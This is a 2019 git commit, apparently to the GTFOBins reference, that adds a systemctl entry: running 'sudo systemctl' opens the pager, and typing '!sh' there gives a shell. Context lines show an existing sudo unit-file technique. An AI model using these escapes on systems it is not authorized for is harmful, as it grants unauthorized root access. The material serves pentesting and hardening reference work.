Add systemctl sudo shell usingpager

This commit is contained in:
Rich Mirch 2019-04-16 08:41:32 -05:00 committed by Andrea Cardaci
parent 20607b9b3c
commit f79b10a5f8

View File

@ -20,4 +20,8 @@ functions:
WantedBy=multi-user.target' > $TF WantedBy=multi-user.target' > $TF
sudo systemctl link $TF sudo systemctl link $TF
sudo systemctl enable --now $TF sudo systemctl enable --now $TF
- description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
code: |
sudo systemctl
!sh
--- ---